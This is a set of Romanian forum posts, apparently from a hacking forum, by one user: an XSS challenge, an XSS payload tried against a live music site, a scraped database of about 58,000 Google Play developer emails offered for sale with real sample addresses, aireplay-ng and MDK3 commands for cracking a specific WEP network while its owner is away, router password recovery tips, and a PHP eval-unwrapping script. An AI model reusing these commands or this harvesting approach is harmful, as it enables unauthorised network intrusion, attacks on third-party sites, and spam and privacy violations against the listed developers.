shark0der

Pentru ca am hotarat sa numesc toate serverele cu chestii legate de muzica, hertz fiind unitatea de masura pentru frecventa, inclusiv a undelor sonore

Nu incercam sa te atac, doar spuneam ce am vazut in loguri: Ora serverului e +4. Mesajul tau era postat la 17:54. Tu din cate se vede folosesti Opera. Tragem concluziile. Inchidem discutia asta pentru ca este inutila. Totusi ca sa iti dau dreptate si tie: daca primesti eroare, e din cauza ca filtrul iti sterge continutul, si variabila ramane empty, de aici si eroarea. Ca sa verifici ca de fapt e din cauza filtrului si nu a serverului, incerci sa trimiti "x" si "y" in campuri, si vei vedea ca merge de fiecare data. Edit: Voi face update si la postul initial, ca sa fie clar tuturor.

Andrew, tu macar nu figurezi in loguri. La ora la care ai postat tu, nu a fost nici o accesare la challenge (apache access.log).

Ascunde te rog rezultatul ca sa nu fie mai usor pentru altii EDIT: @abraxyssE valabila chestia care ai gasit-o? Te-am gasit in loguri dupa msg_id-ul postat inital, dar: 1. sau nu am logat eu bine datele 2. sau ceea ce ai gasit tu nu merge Ai gasit pana la urma sau nu?

Reparat. O sa fac un script sa se autorepare, am niste probleme cu serverul...

Story: Gigel si-a facut propriul client de email. Incercati sa treceti de filtrul XSS care filtreaza campul "to" si "subject". Mesajul ("message") nu se ia in considerare pentru ca ne intereseaza codul sa se execute imediat ce Gigel deschide inboxul (este ignorat de server de fapt, nu are rost sa-l modificati). URL: Challenge-ul se afla aici. Rules: Castigatorul trebuie sa posteze screenshot in care sa se vada numele sau (in alert de exemplu) + message id ca sa pot verifica. Winers: - ==== Edit: am reparat eroarea "Error: something is broken. That's all I know :|". Va rog sa ma anuntati daca se mai intampla. ==== Edit 2: am facut un cron care verifica daca nu apare eroarea si o repara in caz de e . E o solutie mai taraneasca ca de fapt ar trebui sa repar problema din radacina, dar lucreaza You're all invited now! ==== Update: Daca mai primiti eroare, e din cauza ca nu ati trecut de filtru (vedeti discutiile de mai jos). Punct.

Nu am zis ca am gasit o vulnerabilitate - nu e showoff, mai mult de atat nici nu am folosit cuvantul "vulnerabilitate". Am gasit doar ca e vulnerabil, nu vulnerabilitatea in sine - din acest motiv am si postat la "Challenges", ca am belit ochii unde as putea posta asa ceva. Am mentionat clar ca nu se face pentru bani, si am spus clar ca ar fi bine sa nu se sparga nimic, adica intelege si unul cu 2 clase ca e in scop educational, ceea ce nu contravine nici uneia din regulile site-ului (chiar am recitit intreg regulamentul ca sa fiu sigur). Te invit sa ma contrazici daca nu am dreptate.

Cine are chef, asta e la ce am ajuns eu, mai lipseste un spatiu (cred) care nu ma lasa sa-l bag: http://www.dubstep.net/?p=2'onclick='alert(1);' Nu e vreun pe bani, nici premiu, nici vreun ajutor pentru mine, nici nimic altceva - doar daca are cineva chef distractii Ar fi bine sa nu spargeti nimic ci doar sa gasiti si eventual sa raportati, ascult muzica de acolo in fiecare zi PS: Nu uitati sa postati aici daca gasiti ceva

Salut! La un moment dat aveam o idee sa fac tot ceva de genul, si am experimentat un pic. M-am axat mai mult pe GUI si pe niste plugin-uri interesante. Aveti aici arhiva cu ce facusem https://www.dropbox.com/s/3rf8qayeynmdif1/terminal_blog.tar.gz . Poate preluati anumite parti

Recunosc ca nu sunt un utilizator destul de experimentat in domeniul forumurilor, pentru ca nu petrec prea mult timp pe ele, dar nu am postat acelasi anunt de 2 ori. Cel putin asta e definitia double-post-ului pe wikipedia: Am citit si regulamentul forumului, si punctul care se refera la double-posting: da de inteles clar ca daca vrei sa adaugi ceva, nu trebuie sa copiezi tot postul inca o data ci sa-i faci update - asa am si facut prima oara cand am anuntat ca am modificat scriptul si continui colectarea de adrese. Dat fiind ca atunci cand am venit cu informatii noi erau mai mult de 24 de ore trecute de cand am inceput threadul, am considerat de cuviinta sa comunic noile informatii intr-un post nou. E ca si cum ai folosi "pardon" in vorbire: imediat dupa ce ai zis ceva si iti dai seama ca ai spus ceva gresit, daca vrei sa te corectezi sau sa adaugi ceva, spui "pardon", si zici ce ai de zis iar daca a doua zi vrei sa mai zici ceva, ar fi dubios sa spui "pardon" asa din senin, nu? Imi cer scuze si promit sa nu mai fac pe viitor daca gresesc si se demonstreaza ca intr-adevar nu e asa cum zic.

Dupa cum am zis, rulez scriptul in continuare si acum am 80K de mailuri.

Sunt incluse detaliile despre aplicatiile din paginile carora s-a extras emailul (numele aplicatiei, numele autorului, pretul aplicatiei, ratingul, numarul de voturi) ceea ce inseamna ca se pot targeta actiunile (se pot filtra de exemplu doar mailurile developerilor cu aplicatii free sau doar alea cu plata). Toate mail-urile sunt de pe Google Play store colectate de mine personal. Planuiesc sa mai strang si altele (trebuie sa modific un pic scriptul ca sa descopar id-uri de aplicatii noi). UPDATE: Am modificat scriptul si colectez adrese in continuare. Mai multe detalii: # numarul total de aplicatii in tabel mysql> select count(*) from apps where state = 'done'; +----------+ | count(*) | +----------+ | 156632 | +----------+ 1 row in set (0.00 sec) Structura tabelului - toate preturile sunt in $, asa cum le vezi cu un proxy de US ( vezi demo mai jos ) - state e doar pentru uz intern: * "locked" e doar pentru a nu parsa aceeasi aplicatie in mai multe threaduri odata * "error" se refera la aplicatiile pagina carora imi da 404 (au fost sterse de pe store inainte de a ajunge sa le parsez). mysql> explain apps; +--------+-----------------------------------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +--------+-----------------------------------------+------+-----+---------+----------------+ | id | int(10) unsigned | NO | PRI | NULL | auto_increment | | app_id | varchar(64) | YES | UNI | NULL | | | title | varchar(32) | YES | | NULL | | | author | varchar(64) | YES | | NULL | | | email | varchar(64) | YES | MUL | NULL | | | price | varchar(16) | YES | MUL | NULL | | | rating | decimal(5,2) | YES | | NULL | | | votes | int(10) unsigned | YES | | NULL | | | state | enum('pending','locked','done','error') | YES | MUL | NULL | | +--------+-----------------------------------------+------+-----+---------+----------------+ 9 rows in set (0.00 sec) Numarul de mailuri unice in db (a se intelege ca acelasi mail se gasea la mai multe aplicatii de acelasi developer) mysql> select count(*) from (select count(*) from apps where email like '%@%' group by email) x; +----------+ | count(*) | +----------+ | 58553 | +----------+ 1 row in set (0.00 sec) Demo. Prefixul "mailto:" il pot sterge foarte usor, no worries. mysql> select * from apps order by rand() limit 5 \G; *************************** 1. row *************************** id: 115385 app_id: com.gau.go.launcherex.theme.Sira title: Sira GO LauncherEX Theme author: ZT.art email: mailto:ztart.theme@gmail.com price: $1.99 rating: 4.50 votes: 300 state: done *************************** 2. row *************************** id: 140109 app_id: com.androjunky.prop.delhi title: Delhi Real Estate Finder author: Shamanth email: mailto:shamanth.murthy@gmail.com price: Free rating: 4.50 votes: 4 state: done *************************** 3. row *************************** id: 132382 app_id: org.marcus905.wifi.ace title: WiFi Advanced Config Editor author: Marcus905 email: mailto:marcus90@gmail.com price: Free rating: 4.30 votes: 464 state: done *************************** 4. row *************************** id: 17448 app_id: com.naturalapps.vinos title: My Wines author: Natural Apps email: mailto:info@naturalapps.com price: $5.76 rating: 3.80 votes: 14 state: done *************************** 5. row *************************** id: 14327 app_id: com.movingplayer.dragon title: Drag'On author: MovingPlayer email: mailto:support@movingplayer.com price: Free rating: 4.20 votes: 107 state: done 5 rows in set (0.54 sec) Astept intrebari si oferte.

As vrea sa discutam aceasta intrebare in continuare, mai mult pentru POC De fapt -54 e destul de OK chiar, si numarul de beacons creste in graba, doar ca am modificat un pic datele cand am postat topicul, pentru ca nu aveam pentru moment date reale. Am testat injectarea cu: aireplay-ng -9 -e RomTelecom-WEP-7D04 wlan0 si e OK. Am putut sa ma autentific/asociez cu AP-ul (nu merge din prima de fiecare data, dar merge) cu: aireplay-ng -1 0 -e RomTelecom-WEP-7D04 -a 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 Pentru capturare de pachete ARP, generare si injectare am incercat urmatoarele: # start arp request reply mode aireplay-ng -3 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 # fragmentation aireplay-ng -5 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 # chopchop aireplay-ng -4 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 Hardware-ul folosit imi permite schimbari de mac / injectari de pachete si toate chestiile necesare (din lshw: driver=ath9k), testat cu chestiile prezentate aici injection_test [Aircrack-ng]. Output-ul din postul meu precedent e generat chiar de MDK3, la momentul de fata ultima versiune fiind 6. Si dupa cum am si spus, nu se intampla nimic. Numarul maxim de clienti asociati ramane 31, chiar daca numarul de clienti autentificati creste. Uneori mai da afara din asociati, si ii ia pe altii in loc, dar se intampla dupa ceva mai mult timp de asteptare. Cred totusi ca e un modem adsl / router RomTelecom pentru ca sunt 2 puncte de acces cu aceeasi putere de semnal, unul WEP si unul WPA, si mac-uri aproape identice. Personal chiar nu as opri routerul cand plec de acasa, chiar si in vacanta, si cred ca sunt suficiente persoane care ar face la fel. O varianta ar fi sa nu aiba internet, si atunci nimeni nu l-ar folosi. Totusi ramane o provocare pentru mine Any other idea?

Chiar si cu eroarea precedenta, a mers oarecum, doar ca mai mult de 31 nu creste: Clients: Created: 1902 Authenticated: 1755 Associated: 31 Got Kicked: 0 Data : Captured: 0 Sent: 0 Responses: 0 Relayed: 0 Packets sent: 58520 - Speed: 598 packets/sec

Pentru parolele cu asterisk de cele mai dese ori merge un inspect in firebug sau echivalentul lui din chrome. Daca nu merge asta, merge metoda spusa de @mrjasdf, intrucat intr-adevar unele routere codifica parola din input, si pune sau stelute, sau pun ceva de genul: 5Kb4SkVGaE (asa e la un EDIMAX "Wireless 3G Router" cu "Hardware Version: Rev. A" si "Runtime Code Version: 2.24p"), iar in config au parola in plain text sau mai e a treia varianta cand e config "binar" si atunci ajuta asta RouterPassView - Recover lost password from router backup file - nu merge pentru toate routerele, dar are destule. Iar referitor la Gerix, vad in descriere ca e: "Gerix Wifi Cracker NG (New Generation), a really complete GUI for Aircrack-NG which includes useful extras.", iar cum aircrack-ng direct in terminal, nu cred ca as avea un motiv sa folosesc Gerix. "The software requires: aircrack-ng, xterm, machchanger, zenity and obviously python-qt3." aircrack-ng - e pentru retele wifi xterm - nu necesita descriere machchanger - e echivalentul ifconfig wlan0 down; ifconfig wlan0 hw ether e4:ce:8f:ac:9e:df; ifconfig wlan0 up zenity - din cate stiu e doar pentru mesaje: "zenity - display GTK+ dialogs" iar python-qt3 e doar pentru GUI. Prin urmare Gerix nu are nimic in plus. Un search mi-a sugerat un programel care trimite pachete de autentificare spre AP, s-a compilat, ruleaza, dar nu pare sa se intample nimic mai mult. Face Ionel ceva gresit, sau trebuie trimise altfel de pachete? EDIT: Aparent programelul are ceva bug-uri, ca dupa ce am vrut sa pun placa inapoi in mode managed, aveam asa: wlan0 Link encap:UNSPEC HWaddr C4-46-19-31-47-FA-00-00-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MTU:1500 Metric:1 RX packets:1166157 errors:0 dropped:0 overruns:0 frame:0 TX packets:922970 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:865009277 (865.0 MB) TX bytes:370937643 (370.9 MB) Ceea ce nu pare deloc a fi mac valid.

Salutare tuturor, Probabil multi stiu ca by default RomTelecom-ul are enabled 2 retele: CH 2 ][ Elapsed: 4 s ][ 2012-05-05 12:55 ][ paused output BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 7A:4C:A9:A4:7D:04 -52 11 0 0 2 54e. WEP WEP RomTelecom-WEP-7D04 7A:4C:A9:A4:7D:05 -52 13 0 0 2 54e. WPA2 CCMP PSK RomTelecom-WPA-7D04 Sa presupunem ca Vasilica si-a facut abonament si sau stiind ca WEP-ul e usor crack-uibil sau pur si simplu din noroc, Vasilica s-a conectat si foloseste mereu doar AP-ul cu WPA. Pentru a sparge un WEP, vecinul sau Ionel care se afla suficient de aproape de AP, are nevoie de cel putin un packet ARP, dar din moment ce Vasilica nu foloseste acea retea, chiar dupa mult timp de asteptare, vede acelasi "zero" la "#Data": CH 2 ][ Elapsed: 5 mins ][ 2012-05-05 13:00 ][ paused output BSSID PWR RQX Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 7A:4C:A9:A4:7D:04 -54 93 3070 0 2 54e. WEP WEP RomTelecom-WEP-7D04 Din motivele astea, Ionel nu poate folosi ARP Reply attack: root@ionel-laptop # aireplay-ng -3 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 13:07:44 Waiting for beacon frame (BSSID: 7A:4C:A9:A4:7D:04) on channel 2 Saving ARP requests in replay_arp-0706-181144.cap You should also start airodump-ng to capture replies. Read 449720 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) dar nici fragmentation attack: root@ionel-laptop # aireplay-ng -5 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 13:10:09 Waiting for beacon frame (BSSID: 7A:4C:A9:A4:7D:04) on channel 2 13:10:09 Waiting for a data packet... Read 242756 packets... si nici chopchop: root@ionel-laptop # aireplay-ng -4 -b 7A:4C:A9:A4:7D:04 -h C4:46:19:57:27:F9 wlan0 18:13:20 Waiting for beacon frame (BSSID: 7A:4C:A9:A4:7D:04) on channel 2 Read 144789 packets... (fragmentation attack si chopchop au nevoie de macar un pachet de date). Stie cineva vreo metoda care ar mai putea fi incercata pentru a genera cateva pachete si a sparge minunatul WEP? Mentionez ca Ionel nu are placa video suficient de buna, nu are prieteni care ar putea sa-i ofere computational power si nici bani sa cumpere o bucatica de nor aka cloud ca sa sparga un WPA. Deasemenea mentionez ca Vasilica saptamana asta e la mare, si Ionel nu poate folosi nici social engineering ca sa-l convinga pe Vasilica sa intre putin pe cealalta retea.

Ca si alternativa misto mai e si phpQuery. Ai grija sa faci $pq->unloadDocument() daca faci scripturi cu multe request-uri, ca de altfel papa multa memorie (unset nu ajuta)

let i=0; while [ true ] do let i=i+1; let j=i+1; let c=$(cat ${i}.php | grep eval | wc -l) if [ $c -eq 1 ]; then cp ${i}.php ${i}.original.php sed -i 's/eval(/echo (/' ${i}.php php ${i}.php > ${j}.php echo created $j.php echo press any key to continue read else echo done :\) break fi done